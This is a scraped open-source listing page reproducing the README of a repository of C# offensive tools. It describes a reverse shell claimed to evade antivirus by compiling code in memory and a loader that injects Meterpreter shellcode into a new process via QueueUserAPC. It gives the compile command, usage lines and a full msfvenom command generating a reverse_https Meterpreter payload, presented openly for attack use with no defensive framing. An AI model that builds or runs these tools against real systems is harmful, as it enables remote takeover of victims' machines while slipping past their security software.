Awesome Open Source
Awesome Open Source


random C# tools and scripts for Pentesting and offensive stuff


Simple yet effective C# reverse shell, at the moment can bypass many (maybe all) AVs
Simple technique is used -> it compiles code in memory
IDE VS 2015 , csproj is available. Compile platform choiche is yours: suggested is x64
You can also compile it with :
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x64 /out:sharpthrough.exe Program.cs

Usage :
sharpthrough.exe IP PORT


Executing Meterpreter generated shellcode via QueueUserAPC:
(create a new process, "cmd.exe" in this case, injects and executes shellcode in process memory).
First, generate your Meterpreter payload in C# format, like this :
msfvenom -a x64 -p windows/x64/meterpreter/reverse_https lhost= lport=443 -f csharp -o pay.txt
Watch out to your architecture choice! x64 payload will only work with x64 executable version of sharpmeter.
Do not touch generated payload format (not even the variable name)! Leave it as it is.

Usage :
sharpmeter.exe PATH_TO_PAYLOAD

Setup your Meterpreter handler + payload listener on the attacking machine

An example payload (x64 format) is attached inside the project. IDE VS 2015, csproj is available.
This program is capable of running ANY shellcode but you need to be aware of shellcode format; it has to be in "meterpreter" format, so you may eventually convert it (but it's an easy task)

Get A Weekly Email With Trending Projects For These Topics
No Spam. Unsubscribe easily at any time.
C Sharp (278,472
Windows (9,689
Reverse Shell (263
Related Projects